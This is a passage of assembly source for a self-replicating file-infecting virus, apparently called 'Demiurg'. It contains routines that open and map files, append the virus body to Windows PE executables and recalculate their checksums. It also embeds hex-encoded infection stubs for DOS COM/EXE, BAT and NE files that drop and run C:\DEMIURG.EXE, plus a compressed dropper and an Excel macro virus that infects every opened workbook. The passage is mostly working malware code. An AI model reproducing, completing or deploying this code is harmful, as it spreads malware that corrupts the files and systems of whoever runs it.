call finish_PE_infection ; append virus, recalc CRC
already_infected:
abort_infection:
call closemap ; close filemap and file
quit_infect_error:
RET
; ----- END INFECT FILE -----------------------------------------------------
openfile:
mov [ebp+offset filename_ofs], edx
push edx ; offset filename
call [ebp+offset GetFileAttributesA]
mov [ebp+attributes], eax
inc eax
JNZ get_attribs_ok
stc
ret
get_attribs_ok:
push 80h ; normal attributes
push dword ptr [ebp+offset filename_ofs]
call [ebp+offset SetFileAttributesA]
or eax, eax
JNZ kill_attribs_ok
stc
ret
kill_attribs_ok:
push 0 ; template file (shit)
push 80h ; file attributes (normal)
push 3 ; open existing
push 0 ; security attributes (shit)
push 0 ; do not share file
push 0C0000000h ; read/write mode
push dword ptr [ebp+offset filename_ofs] ; pointer to filename
call [ebp+offset CreateFileA]
mov [ebp+filehandle], eax
inc eax ; EAX= -1 (Invalid handle val)
JNZ open_ok
stc
ret
open_ok:
lea eax, [ebp+offset LastWriteTime]
push eax
sub eax, 8
push eax
sub eax, 8
push eax
push dword ptr [ebp+offset filehandle]
call [ebp+offset GetFileTime]
or eax, eax
JNZ get_time_ok
call closefile
stc
ret
get_time_ok:
push 0 ; high filesize dword ptr
push dword ptr [ebp+offset filehandle]
call [ebp+offset GetFileSize]
mov [ebp+offset filesize], eax
inc eax
JNZ get_filesize_ok
call closefile
stc
ret
get_filesize_ok:
add eax, workspace-1
JMP mapfile
createfile:
mov [ebp+offset filename_ofs], edx
push 0 ; template file (shit)
push 80h ; file attributes (normal)
push 1 ; create new file (failure if
; old one exists)
push 0 ; security attributes (shit)
push 0 ; do not share file
push 0C0000000h ; read/write mode
push edx ; pointer to filename
call [ebp+offset CreateFileA]
mov [ebp+offset filehandle], eax
inc eax ; EAX= -1 (Invalid handle val)
JNZ createfile_ok
stc
RET
createfile_ok:
mov dword ptr [ebp+offset attributes], 80h
lea edi, [ebp+offset CreationTime]
xor eax, eax
mov ecx, 6
rep stosw
mov [ebp+offset filesize], ecx ; filesize=0
mov eax, workspace
mapfile:
push 0 ; name file mapping obj (shit)
push eax ; low dword of filesize
push 0 ; high dword of filesize
push 4 ; PAGE_READWRITE
push 0 ; security attributes (shit)
push dword ptr [ebp+offset filehandle]
call [ebp+offset CreateFileMappingA]
mov [ebp+offset maphandle], eax
or eax, eax ; close?
JNZ createfilemapping_ok
call closefile
stc
RET
createfilemapping_ok:
push 0 ; map the whole file
push 0 ; low dword of fileoffset
push 0 ; high dword of fileoffset
push 2 ; read/write access
push dword ptr [ebp+offset maphandle]
call [ebp+offset MapViewOfFile]
mov [ebp+offset mapbase], eax
or eax, eax
JNZ mapfile_ok
call closemaphandle
stc
RET
mapfile_ok:
push eax
xchg edi, eax
add edi, [ebp+offset filesize]
xor eax, eax
mov ecx, workspace
rep stosb
pop eax
clc
RET
closemap:
push dword ptr [ebp+offset mapbase]
call [ebp+offset UnmapViewOfFile]
closemaphandle:
push dword ptr [ebp+offset maphandle]
call [ebp+offset CloseHandle]
push 0 ; move relative to start of file
push 0 ; high word pointer of file offset
push dword ptr [ebp+offset filesize]
push dword ptr [ebp+offset filehandle]
call [ebp+offset SetFilePointer]
push dword ptr [ebp+offset filehandle]
call [ebp+offset SetEndOfFile]
closefile:
lea eax, [ebp+offset LastWriteTime]
push eax
sub eax, 8
push eax
sub eax, 8
push eax
push dword ptr [ebp+offset filehandle]
call [ebp+offset SetFileTime]
push dword ptr [ebp+offset filehandle]
call [ebp+offset CloseHandle]
push dword ptr [ebp+offset attributes]
push dword ptr [ebp+offset filename_ofs]
call [ebp+offset SetFileAttributesA]
RET
; ----- MODIFY PE FILE LAST SECTION/IMAGESIZE FOR INFECTION -----------------
append_PE:
movzx ecx, word ptr [ebx+6] ; ECX=number of sections
dec ecx ; ECX=number of last section
push ebx ; save PE header offset
movzx edx, word ptr [ebx+14h] ; EDX=size of optional header
add ebx, edx ; add size of optional header
add ebx, 18h ; add size of file header
; EBX=first section header
xor edx, edx ; EDX=0
mov eax, 40 ; EAX=size of one sect.header
mul ecx ; EAX=size of n-1 sect.headers
add ebx, eax ; EBX=last sect.header pointer
pop eax ; EAX=PE header pointer
or dword ptr [ebx+24h], 0E0000020h ; modify last section flags:
; read, write, exec, code
mov ecx, [ebx+8h] ; ECX=VirtualSize of last sect
or ecx, ecx ; VirtualSize=0 ?
JNZ VirtualSize_OK ; if not, it's ok
mov ecx, [ebx+10h] ; if yes, it means that
; VirtualSize=SizeOfRawData
VirtualSize_OK:
mov edx, ecx ; EDX=last sect. VirtualSize
add edx, [ebx+14h] ; add PointerToRawData
add edx, [ebp+mapbase] ; add start of memmap
mov [ebp+offset virus_start], edx ; save start of virus in map
mov edx, ecx ; EDX=VirtualSize
add edx, [ebx+0Ch] ; add VirtualAddress
mov [ebp+offset virus_RVA], edx ; save virus RVA
add ecx, virus_size ; ECX=new section size
push ecx ; save it
mov [ebx+8h], ecx ; set it as new VirtualSize
mov edx, [eax+3Ch] ; EDX=filealign
call align_ECX ; align physical sect. size
mov [ebx+10h], ecx ; save it as new SizeOfRawData
add ecx, [ebx+14h] ; add PointerToRawData
mov [ebp+filesize], ecx ; save it as new file size
pop ecx ; ECX=new section size
add ecx, [ebx+0Ch] ; ECX=new imagesize
mov edx, [eax+38h] ; EDX=SectionAlign
call align_ECX ; align the new imagesize
mov [eax+50h], ecx ; set it as new image size
RET
; ----- MOVE VIRUS BODY AND RECALCULATE CHECKSUM ----------------------------
finish_PE_infection:
lea esi, [ebp+start] ; ESI=start of virus body
mov edi, [ebp+virus_start] ; EDI=virus place in victim
mov ecx, virus_size ; ECX=size of virus
rep movsb ; copy virusbody to filemap
add ebx, 58h ; EBX=PE checksum in map
cmp dword ptr [ebx], 0 ; checksummed file?
JE end_finish_PE_infection ; if not, we are done
lea eax, [ebp+offset imagehlp_dll] ; EAX=ptr to "IMAGEHLP.DLL"
push eax
call [ebp+offset LoadLibraryA] ; load IMAGEHLP.DLL
or eax, eax ; EAX=0 means we failed
JZ end_finish_PE_infection
push ebx ; save pointer to old CRC
lea esi, [ebp+offset CheckSumMappedFile] ; get the CheckSumMappedFile
call My_GetProcAddress ; API
pop ebx ; restore pointer to old CRC
JC end_finish_PE_infection
mov ecx, [edx+eax] ; ECX=API RVA
add eax, ecx ; ECX=API VA
push ebx ; old CRC pointer
lea ebx, [ebp+dummy_dword]
push ebx ; place to store old CRC
push dword ptr [ebp+filesize] ; size of file
push dword ptr [ebp+mapbase] ; mapbase
call eax ; call CheckSumMappedFile
end_finish_PE_infection:
RET
; ----- GetAPIs -------------------------------------------------------------
; EAX=Module Base Address
; ECX=Number of APIs
; ESI=pointer to names table
; EDI=pointer to addresses table
GetAPIs:
get_APIs_loop:
push ecx ; save number of APIs
push eax ; save module base address
push edi ; save pointer to address tbl
call My_GetProcAddress ; get RVA of RVA of one API
pop edi ; EDI=where to store the RVAs
mov ecx, [edx+eax] ; ECX=API RVA
add eax, ecx ; EAX=API VA
stosd ; store the API VA
next_API_loop:
inc esi ; go to next byte
cmp byte ptr [esi], 0 ; reached end of API name?
JNE next_API_loop ; if not, search on
inc esi ; ESI=next API name
pop eax ; EAX=module base address
pop ecx ; ECX=number of APIs left
LOOP get_APIs_loop ; get the next API
RET
; ----- My_GetProcAddress ---------------------------------------------------
; input:
; EAX=module base address
; ESI=API function name
; output:
; EDX=RVA of RVA of API function
My_GetProcAddress:
mov ebx, eax ; EBX=module base address
add ebx, [eax+3Ch] ; EBX=new exe header
mov ebx, [ebx+78h] ; EBX=export directory RVA
add ebx, eax ; EBX=export directory VA
xor ecx, ecx ; ECX=0 (counter)
mov edx, [ebx+18h] ; EDX=NumberOfNames
mov edi, [ebx+20h] ; EDI=AddressOfNames array RVA
add edi, eax ; EDI=AddressOfNames array VA
search_loop:
pusha ; save all registers
mov edi, [edi+ecx*4] ; EDI=RVA of current API name
add edi, eax ; EDI=VA of current API name
cmp_loop:
lodsb ; get a byte from our API name
cmp byte ptr [edi], al ; is this byte equal?
JNE search_on_API ; if not, this isn't our API
inc edi ; compare next byte
or al, al ; reached end of API name ?
JNE cmp_loop ; if not, go on with compare
JMP found_API ; if yes, we found our API!
search_on_API:
popa ; restore all registers
inc ecx ; try the next exported API
cmp ecx, edx ; end of exported APIs?
JL search_loop ; if yes, try the next one
API_not_found:
popa ; restore all regisers
stc ; indicate error with carry
RET
found_API:
popa ; restore all registers
mov edx, [ebx+24h] ; EDX=AddressOfOrdinals RVA
add edx, eax ; EDX=AddressOfOrdinals VA
movzx ecx, word ptr [edx+ecx*2] ; ECX=our API's ordinal
mov edx, [ebx+1Ch] ; EDX=AddressOfFunctions RVA
lea edx, [edx+ecx*4] ; EDX=RVA of RVA of API
clc ; successful, clear carry
RET
; ----- aligns ECX to EDX ---------------------------------------------------
align_ECX:
push ebx ; save EBX
xchg eax, ecx ; EAX=value to be aligned
mov ebx, edx ; EBX=alignment factor
xor edx, edx ; zero out high dword
div ebx ; divide
or edx, edx ; remainer zero?
JZ no_round_up ; if so, don't round up
inc eax ; round up
no_round_up:
mul ebx ; multiply again
xchg eax, ecx ; ECX=aligned value
mov edx, ebx ; EDX=alignment factor
pop ebx ; restore EBX
RET
; ----- DECOMPRESS ----------------------------------------------------------
; ESI : Source buffer offset
; EDI : Destination buffer offset
; EBX : size compressed data
decompress:
add ebx, esi ; EBX=pointer to end of
; compressed data
cld ; clear direction flag
loop_head:
lodsb ; get a byte from compr. data
cmp al, '<27>' ; is it our special byte?
JNE store ; if not, just treat it normal
xor eax, eax ; EAX=0
lodsb ; EAX=number of repetitions
xchg eax, ecx ; ECX=number of repetitions
lodsb ; AL=byte to store repetively
rep stosb ; store the byte repetively
JMP go_on ; go on with the next byte
store:
stosb ; simply store the byte
go_on:
cmp ebx, esi ; reached the end?
JA loop_head ; if not, just decompress on
RET
; ----- CREATES THE PE DROPPER ----------------------------------------------
; input:
; EDI-where to put the dropper
create_dropper:
pusha ; save all registers
mov dword ptr [ebp+orig_eip], 401060h ; set EntryRVA for dummy PE
mov dword ptr [ebp+imagebase], 400000h ; set ImageBase for dummy PE
mov ebx, dummy_PE_size ; EBX=size of dummy PE file
lea esi, [ebp+offset dummy_PE] ; ESI=pointer to compressed
; PE file dropper
call decompress ; decompress it
lea esi, [ebp+start] ; ESI=start of virus body
mov ecx, virus_size ; ECX=size of virus body
cld ; clear direction flag
rep movsb ; copy virus body
popa ; restore all registers
RET
; ----- compressed new header for COM->EXE conversion -----------------------
new_mz_header:
db 04Dh, 05Ah, 0E6h, 006h, 000h, 002h, 000h, 001h
db 000h, 0FFh, 0FFh, 0F0h, 0FFh, 0FEh, 0FFh, 000h
db 000h, 000h, 001h, 0F0h, 0FFh, 0E6h, 008h, 000h
new_mz_header_size EQU ($ - new_mz_header)
; ----- code that will be added to dos exe/com files ------------------------
;
; .286
; .model tiny
; .code
; org 100h
; start:
; pusha ; save all registers
; push ds ; save segment registers
; push es
;
; call next ; get delta offset
; next:
; pop bp
; sub bp, offset next
;
; mov ax, ds ; AX=PSP segment
; dec ax ; AX=MCB segment
; mov ds, ax ; DS=MCB segment
; mov bx, ds:[3] ; BX=MCB size (in paragraphs)
; sub bx, 0E00h ; shrink MCB for 0E00h bytes
;
; mov ah, 4Ah ; resize MCB in ES to BX paragraphs
; int 21h ; we need to free RAM if we want to
; ; execute another program, even if
; ; it is for Windows
;
; push cs ; DS=CS
; pop ds
;
; mov ax, es ; AX=ES=PSP segment
; mov [bp+offset segm], ax ; save in data block
;
; push cs ; ES=CS
; pop es
;
; mov ah, 3Ch ; create file
; xor cx, cx ; CX=0 (attribtes for new file)
; lea dx, [bp+offset filename] ; DS:DX=pointer to filename
; int 21h
;
; xchg bx, ax ; handle to BX
;
; mov ah, 40h ; write to file
; mov cx, dropper_size ; write the whole dropper
; lea dx, [bp+offset dropper] ; DS:DX=pointer to write buffer
; int 21h
;
; mov ah, 3Eh ; close file
; int 21h
;
; execute:
; mov ax, 4B00h ; execute file
; lea bx, [bp+offset parameter] ; ES:BX=pointer to parameter block
; lea dx, [bp+offset filename] ; DS:DX=pointer to filename
; int 21h
;
; pop es ; restore segment registers
; pop ds
;
; mov ax, es ; AX=PSP segment
; add ax, 10h ; AX=start segment of program image
; add [bp+relo_CS], ax ; relocate old segment values
; add [bp+relo_SS], ax
;
; popa ; restore all registers
;
; db 68h ; push imm16
; relo_SS dw ?
;
; cli
; pop ss ; set host SS
; db 0BCh ; mov sp, imm16
; SP_start dw ?
; sti
;
; db 0EAh ; jmp far imm32
; IP_start dw ?
; relo_CS dw ?
;
;
; filename db "C:\DEMIURG.EXE", 0
;
; parameter:
; dw 0 ; same enviroment as caller
; dw 80h
; segm dw 0
; dw 4 dup(0FFFFh) ; FCB addresses (nothing)
;
; dropper:
;
; end start
dos_virus_code:
db 060h, 01Eh, 006h, 0E8h, 000h, 000h, 05Dh, 081h
db 0EDh, 006h, 001h, 08Ch, 0D8h, 048h, 08Eh, 0D8h
db 08Bh, 01Eh, 003h, 000h, 081h, 0EBh, 000h, 00Eh
db 0B4h, 04Ah, 0CDh, 021h, 00Eh, 01Fh, 08Ch, 0C0h
db 089h, 086h, 07Eh, 001h, 00Eh, 007h, 0B4h, 03Ch
db 033h, 0C9h, 08Dh, 096h, 06Bh, 001h, 0CDh, 021h
db 093h, 0B4h, 040h, 0B9h
dw dropper_size
db 08Dh, 096h
db 088h, 001h, 0CDh, 021h, 0B4h, 03Eh, 0CDh, 021h
db 0B8h, 000h, 04Bh, 08Dh, 09Eh, 07Ah, 001h, 08Dh
db 096h, 06Bh, 001h, 0CDh, 021h, 007h, 01Fh, 08Ch
db 0C0h, 005h, 010h, 000h, 001h, 086h, 069h, 001h
db 001h, 086h, 05Eh, 001h, 061h, 068h
relo_SS dw ?
db 0FAh, 017h, 0BCh
SP_start dw ?
db 0FBh, 0EAh
IP_start dw ?
relo_CS dw ?
db 043h, 03Ah, 05Ch, 044h, 045h
db 04Dh, 049h, 055h, 052h, 047h, 02Eh, 045h, 058h
db 045h, 000h, 000h, 000h, 080h, 000h, 000h, 000h
db 0FFh, 0FFh, 0FFh, 0FFh, 0FFh, 0FFh, 0FFh, 0FFh
size_dos_virus_code EQU ($ - dos_virus_code)
; ----- code that will be added to BAT files --------------------------------
;
; This is the BAT code that is appended at the end of infected BAT files. As
; you see, it ECHOes out a COM file and executes it. Then the COM file reads
; the PE dropper that is stored as a kind of internal overlay at the end of
; the BAT file, writes it to disk and executes it. Here is the ASM source of
; the COM loader first:
;
; .286
; .model tiny
; .code
; org 100h
; start:
; mov ah, 4Ah ; resize memory block
; mov bx, 2020h ; BX=new MCB size in paragraphs
; int 21h
;
; xor bx, bx ; BX=0
; mov bl, 80h ; BX=80h (command line in PSP)
; mov si, bx ; SI=BX
; mov bl, [si] ; BX=length of commandline
; mov [si+bx+1], bh ; make command line zero terminated
;
; mov ax, 3D02h ; open file read/write
; lea dx, [si+2] ; DS:DX=pointer to filename(cmdline)
; int 21h
; JNC file_ok
; RET ; quit com file
;
; file_ok:
; xchg bx, ax ; handle to BX
;
; mov ax, 4202h ; set filepointer relative to EOF
; xor cx, cx ; CX=0
; dec cx ; CX=-1
; mov dx, ((-dropper_size)-1) ; otherwise we would have a zerobyte
; ; in the COM file
; inc dx ; CX:DX=-dropper_size
; int 21h
;
; mov ah, 3Fh ; read from file
; mov cx, dropper_size - 1 ; read the whole PE dropper
; inc cx
; mov dx, offset buffer ; DS:DX=offset to read buffer
; int 21h
;
; mov ah, not 3Eh ; close file
; not ax
; int 21h
;
; mov ah, not 3Ch ; create file
; not ax
; xor cx, cx ; CX=0 (file attributes)
; mov zero, cl ; make filename zero terminated
; mov dx, offset exefile ; DS:DX=pointer to filename
; int 21h
; JC quit
;
; xchg bx, ax ; handle to BX
;
; mov ah, 40h ; write to file
; mov cx, dropper_size - 1 ; CX=size to write (whole PE drpper)
; inc cx
; mov dx, offset buffer ; DS:DX=pointer to write buffer
; int 21h
; JC quit
;
; mov ah, not 3Eh ; close file
; not ax
; int 21h
;
; xor ax, ax ; AX=0
; mov ah, 4Bh ; AX=4B00h
; xor bx, bx ; BX=0 (no parameter block)
; mov dx, offset exefile ; DS:DX=pointer to filename
; int 21h
;
; quit:
; mov ah, 4Ch ; quit program
; int 21h
;
; exefile db "C:\demiurg.exe"
; zero db ?
; buffer:
;
; end start
bat_virus_code:
db "@echo off", 0Dh, 0Ah
db "set overlay=%0", 0Dh, 0Ah
db "if not exist %overlay% set overlay=%0.BAT", 0Dh, 0Ah
db "echo "
db 0B4h, 04Ah, 0BBh, 020h, 020h, 0CDh, 021h, 033h
db 0DBh, 0B3h, 080h, 08Bh, 0F3h, 08Ah, 01Ch, 088h
db 078h, 001h, 0B8h, 002h, 03Dh, 08Dh, 054h, 002h
db 0CDh, 021h, 073h, 001h, 0C3h, 093h, 0B8h, 002h
db 042h, 033h, 0C9h, 049h, 0BAh
dw ((-dropper_size) - 1)
db 042h, 0CDh, 021h, 0B4h, 03Fh, 0B9h
dw (dropper_size - 1)
db 041h
db 0BAh, 07Eh, 001h, 0CDh, 021h, 0B4h, 0C1h, 0F7h
db 0D0h, 0CDh, 021h, 0B4h, 0C3h, 0F7h, 0D0h, 033h
db 0C9h, 088h, 00Eh, 07Dh, 001h, 0BAh, 06Fh, 001h
db 0CDh, 021h, 072h, 01Fh, 093h, 0B4h, 040h, 0B9h
dw (dropper_size - 1)
db 041h, 0BAh, 07Eh, 001h, 0CDh, 021h, 072h, 011h
db 0B4h, 0C1h, 0F7h, 0D0h, 0CDh, 021h, 033h, 0C0h
db 0B4h, 04Bh, 033h, 0DBh, 0BAh, 06Fh, 001h, 0CDh
db 021h, 0B4h, 04Ch, 0CDh, 021h, 043h, 03Ah, 05Ch
db 064h, 065h, 06Dh, 069h, 075h, 072h, 067h, 02Eh
db 065h, 078h, 065h
db ">C:\DEMIURG.EXE"
db 0Dh, 0Ah
db "C:\DEMIURG.EXE %overlay%", 0Dh, 0Ah
db "set overlay=", 0Dh, 0Ah
db 1Ah ; end of text file
size_bat_virus_code EQU ($ - bat_virus_code)
; ------ Code that will be added to NE files --------------------------------
;
; .286
; .model tiny
; .code
; org 100h
; start:
; pusha ; save all registers
; push ds ; save segment registers
; push es
;
; call next ; get delta offset
; next:
; pop si
; add si, (data_block - next)
;
; mov ax, es ; AX=PSP segment
;
; push cs ; DS=CS
; pop ds
;
; push ss ; ES=SS
; pop es
; cld ; clear direction flag
; mov cx, data_size ; CX=size of our data
; sub sp, (data_size+512) ; allocate buffer on stack
; mov bp, sp ; BP=stack frame
; mov di, bp ; DI=our buffer on stack
; rep movsb ; copy data block to stackbuf
;
; push ss ; DS=ES=SS
; push ss
; pop es
; pop ds
;
; mov [bp+4], ax ; set PSP segm in paramblock
;
; mov ax, 3D02h ; open file read/write
; lea dx, [bp+our_filename-data_block] ; DS:DX=filename of our host
; int 21h
; JC exit
;
; xchg bx, ax ; handle to BX
;
; mov ax, 4202h ; set filepointer relative
; ; to the end of the file
; mov cx, -1 ; CX:DX=-dropper_size
; mov dx, -dropper_size
; int 21h
;
; mov [bp+source_handle-data_block], bx ; save filehandle
;
; mov ah, 3Ch ; create file
; xor cx, cx ; CX=0 (file attributes)
; lea dx, [bp+(filename-data_block)] ; DS:DX=pointer to PE dropper
; ; filename ("C:\demiurg.exe")
; int 21h
; JC close_source
;
; mov [bp+dest_handle-data_block], ax ; save filehandle
;
; mov cx, (dropper_size / 512) ; CX=size of dropper in
; ; 512 byte blocks
;
; rw_loop:
; push cx ; save number of blocks left
;
; mov ah, 3Fh ; read from file
; mov bx, [bp+source_handle-data_block] ; BX=source handle
; mov cx, 512 ; CX=size to read
; lea dx, [bp+(buffer-data_block)] ; DS:DX=pointer to read buf
; int 21h
;
; mov ah, 40h ; write to file
; mov bx, [bp+dest_handle-data_block] ; BX=destination handle
; mov cx, 512 ; CX=size to write
; lea dx, [bp+(buffer-data_block)] ; DS:DX=pointer to write buf
; int 21h
;
; pop cx ; CX=number of blocks left
; LOOP rw_loop
;
; mov ah, 3Eh ; close source file
; mov bx, [bp+source_handle-data_block]
; int 21h
;
; mov ah, 3Eh ; close destination file
; mov bx, [bp+dest_handle-data_block]
; int 21h
;
; mov ax, 4B00h ; execute dropper file
; mov bx, bp ; ES:BX=parameter block
; lea dx, [bx+18] ; DS:DX=filename
; int 21h
;
; JMP exit
;
; close_source:
; mov ah, 3Eh ; close file
; mov bx, [bp+source_handle-data_block]
; int 21h
;
; exit:
; add sp, (data_size+512) ; remove stack buffer
;
; pop es ; restore segment registers
; pop ds
; popa ; restore all registers
;
; db 68h ; push imm16
; NE_ip dw 0
; db 0C3h ; ret near
;
; data_block dw 0 ; same enviroment as caller
; dw 80h ; parameter string offset
; segm dw 0
; dw 4 dup(0)
;
; source_handle dw 0
; dest_handle dw 0
; filename db "C:\DEMIURG.EXE", 0
; our_filename db 13 dup(0)
; data_size = $ - data_block
; buffer:
;
; end start
NE_virus_code:
db 060h, 01Eh, 006h, 0E8h, 000h, 000h, 05Eh, 081h
db 0C6h, 094h, 000h, 08Ch, 0C0h, 00Eh, 01Fh, 016h
db 007h, 0FCh, 0B9h, 02Eh, 000h, 081h, 0ECh, 02Eh
db 002h, 08Bh, 0ECh, 08Bh, 0FDh, 0F3h, 0A4h, 016h
db 016h, 007h, 01Fh, 089h, 046h, 004h, 0B8h, 002h
db 03Dh, 08Dh, 056h, 021h, 0CDh, 021h, 072h, 05Fh
db 093h, 0B8h, 002h, 042h, 0B9h, 0FFh, 0FFh, 0BAh
dw -dropper_size
db 0CDh, 021h, 089h, 05Eh, 00Eh, 0B4h
db 03Ch, 033h, 0C9h, 08Dh, 056h, 012h, 0CDh, 021h
db 072h, 03Eh, 089h, 046h, 010h, 0B9h
dw (dropper_size/512)
db 051h, 0B4h, 03Fh, 08Bh, 05Eh, 00Eh, 0B9h, 000h
db 002h, 08Dh, 056h, 02Eh, 0CDh, 021h, 0B4h, 040h
db 08Bh, 05Eh, 010h, 0B9h, 000h, 002h, 08Dh, 056h
db 02Eh, 0CDh, 021h, 059h, 0E2h, 0E2h, 0B4h, 03Eh
db 08Bh, 05Eh, 00Eh, 0CDh, 021h, 0B4h, 03Eh, 08Bh
db 05Eh, 010h, 0CDh, 021h, 0B8h, 000h, 04Bh, 08Bh
db 0DDh, 08Dh, 057h, 012h, 0CDh, 021h, 0EBh, 007h
db 0B4h, 03Eh, 08Bh, 05Eh, 00Eh, 0CDh, 021h, 081h
db 0C4h, 02Eh, 002h, 007h, 01Fh, 061h, 068h
NE_start_IP dw 0
db 0C3h, 000h, 000h, 080h, 000h, 000h, 000h
db 000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h
db 000h, 000h, 000h, 000h, 043h, 03Ah, 05Ch, 044h
db 045h, 04Dh, 049h, 055h, 052h, 047h, 02Eh, 045h
db 058h, 045h, 000h
our_filename db 13 dup(0)
size_NE_virus_code EQU ($ - NE_virus_code)
; ------ dropper code -------------------------------------------------------
;
; This is a dummy PE file that is as small as possible (under 1KB) and just
; calls ExitProcess. It has been infected with the virus, then the virus body
; was removed, then compressed and converted to DB instructions. This means
; that all we have to do to recreate a working dropper is to expand it and
; add the virus body (see procedure create_dropper)
dummy_PE:
db 04Dh, 05Ah, 040h, 000h, 001h, 000h, 000h, 000h
db 004h, 000h, 000h, 000h, 001h, 0E6h, 005h, 000h
db 042h, 04Ah, 000h, 000h, 0F0h, 0FFh, 040h, 0E6h
db 023h, 000h, 040h, 000h, 000h, 000h, 050h, 045h
db 000h, 000h, 04Ch, 001h, 001h, 0E6h, 00Dh, 000h
db 0E0h, 000h, 08Eh, 081h, 00Bh, 001h, 0E6h, 00Eh
db 000h, 068h, 010h, 0E6h, 00Ch, 000h, 040h, 000h
db 000h, 010h, 000h, 000h, 000h, 002h, 000h, 000h
db 001h, 0E6h, 007h, 000h, 003h, 000h, 00Ah, 0E6h
db 006h, 000h, 060h, 000h, 000h, 000h, 002h, 0E6h
db 006h, 000h, 002h, 0E6h, 005h, 000h, 010h, 000h
db 000h, 020h, 0E6h, 004h, 000h, 010h, 000h, 000h
db 010h, 0E6h, 006h, 000h, 010h, 0E6h, 00Ch, 000h
db 010h, 000h, 000h, 054h, 0E6h, 073h, 000h, 02Eh
db 064h, 065h, 06Dh, 069h, 075h, 072h, 067h, 000h
db 050h, 000h, 000h, 000h, 010h, 000h, 000h, 000h
db 042h, 000h, 000h, 000h, 002h, 0E6h, 00Eh, 000h
db 060h, 000h, 000h, 0E0h, 0E6h, 0A0h, 000h, 028h
db 010h, 0E6h, 00Ah, 000h, 038h, 010h, 000h, 000h
db 030h, 010h, 0E6h, 016h, 000h, 046h, 010h, 0E6h
db 006h, 000h, 046h, 010h, 0E6h, 006h, 000h, 04Bh
db 045h, 052h, 04Eh, 045h, 04Ch, 033h, 032h, 02Eh
db 064h, 06Ch, 06Ch, 0E6h, 004h, 000h, 045h, 078h
db 069h, 074h, 050h, 072h, 06Fh, 063h, 065h, 073h
db 073h, 0E6h, 00Dh, 000h, 06Ah, 000h, 0FFh, 015h
db 030h, 010h, 040h, 000h
dummy_PE_size EQU ($ - dummy_PE)
dropper_size EQU 17408
; ----- macro dropper code --------------------------------------------------
;
; This is a (compressed) .xls file that will be stored in the xlstart
; directory of excel. It contains the macro code that will stay resident in
; Excel and infects other .xls files:
;
; Attribute VB_Name = "Demiurg"
; Sub Auto_Open()
; Application.OnSheetActivate = "Infect"
; End Sub
; Sub Infect()
; Application.DisplayAlerts = False
;
; lastchar = Asc(Mid$(ActiveWorkbook.Name, Len(ActiveWorkbook.Name), 1))
; If Asc("1") <= lastchar And lastchar <= Asc("9") Then Exit Sub
;
; For i = 1 To ActiveWorkbook.VBProject.VBComponents.count
; If ActiveWorkbook.VBProject.VBComponents(i).Name = "Demiurg" Then Exit Sub
; Next i
;
; ActiveWorkbook.VBProject.VBComponents.Import ("C:\demiurg.sys")
; ActiveWorkbook.Save
; End Sub
macro_dropper:
db 0D0h, 0CFh, 011h, 0E0h, 0A1h, 0B1h, 01Ah, 0E1h
db 0E6h, 010h, 000h, 03Eh, 000h, 003h, 000h, 0FEh
db 0FFh, 009h, 000h, 006h, 0E6h, 00Bh, 000h, 001h
db 000h, 000h, 000h, 001h, 0E6h, 008h, 000h, 010h
db 000h, 000h, 002h, 000h, 000h, 000h, 002h, 000h
db 000h, 000h, 0FEh, 0FFh, 0FFh, 0FFh, 0E6h, 008h
db 000h, 0E6h, 0FFh, 0FFh, 0E6h, 0B1h, 0FFh, 0FDh
db 0FFh, 0FFh, 0FFh, 009h, 000h, 000h, 000h, 013h
db 000h, 000h, 000h, 004h, 000h, 000h, 000h, 005h
db 000h, 000h, 000h, 006h, 000h, 000h, 000h, 007h
db 000h, 000h, 000h, 008h, 000h, 000h, 000h, 00Ah
db 000h, 000h, 000h, 019h, 000h, 000h, 000h, 00Bh
db 000h, 000h, 000h, 00Ch, 000h, 000h, 000h, 00Dh
db 000h, 000h, 000h, 00Eh, 000h, 000h, 000h, 00Fh
db 000h, 000h, 000h, 010h, 000h, 000h, 000h, 011h
db 000h, 000h, 000h, 012h, 000h, 000h, 000h, 014h
db 000h, 000h, 000h, 0FEh, 0FFh, 0FFh, 0FFh, 015h
db 000h, 000h, 000h, 016h, 000h, 000h, 000h, 017h
db 000h, 000h, 000h, 018h, 000h, 000h, 000h, 01Ah
db 000h, 000h, 000h, 01Dh, 000h, 000h, 000h, 01Bh
db 000h, 000h, 000h, 01Ch, 000h, 000h, 000h, 01Eh
db 000h, 000h, 000h, 0FEh, 0FFh, 0FFh, 0FFh, 0FEh
db 0E6h, 0FFh, 0FFh, 0E6h, 088h, 0FFh, 052h, 000h
db 06Fh, 000h, 06Fh, 000h, 074h, 000h, 020h, 000h
db 045h, 000h, 06Eh, 000h, 074h, 000h, 072h, 000h
db 079h, 0E6h, 02Dh, 000h, 016h, 000h, 005h, 000h
db 0E6h, 008h, 0FFh, 002h, 000h, 000h, 000h, 020h
db 008h, 002h, 0E6h, 005h, 000h, 0C0h, 0E6h, 006h
db 000h, 046h, 0E6h, 004h, 000h, 040h, 026h, 06Ch
db 034h, 03Fh, 085h, 0BFh, 001h, 0C0h, 0DDh, 03Ch
db 04Ah, 03Fh, 085h, 0BFh, 001h, 003h, 000h, 000h
db 000h, 080h, 02Eh, 0E6h, 006h, 000h, 057h, 000h
db 06Fh, 000h, 072h, 000h, 06Bh, 000h, 062h, 000h
db 06Fh, 000h, 06Fh, 000h, 06Bh, 0E6h, 031h, 000h
db 012h, 000h, 002h, 001h, 00Dh, 000h, 000h, 000h
db 0E6h, 008h, 0FFh, 0E6h, 028h, 000h, 092h, 00Ah
db 0E6h, 006h, 000h, 05Fh, 000h, 056h, 000h, 042h
db 000h, 041h, 000h, 05Fh, 000h, 050h, 000h, 052h
db 000h, 04Fh, 000h, 04Ah, 000h, 045h, 000h, 043h
db 000h, 054h, 000h, 05Fh, 000h, 043h, 000h, 055h
db 000h, 052h, 0E6h, 021h, 000h, 022h, 000h, 001h
db 001h, 001h, 000h, 000h, 000h, 00Bh, 000h, 000h
db 000h, 00Ah, 0E6h, 017h, 000h, 0A0h, 03Ch, 035h
db 04Ah, 03Fh, 085h, 0BFh, 001h, 0C0h, 0DDh, 03Ch
db 04Ah, 03Fh, 085h, 0BFh, 001h, 0E6h, 00Ch, 000h
db 056h, 000h, 042h, 000h, 041h, 0E6h, 03Bh, 000h
db 008h, 000h, 001h, 000h, 0E6h, 008h, 0FFh, 005h
db 0E6h, 017h, 000h, 0A0h, 03Ch, 035h, 04Ah, 03Fh
db 085h, 0BFh, 001h, 0A0h, 03Ch, 035h, 04Ah, 03Fh
db 085h, 0BFh, 001h, 0E6h, 00Ch, 000h, 001h, 000h
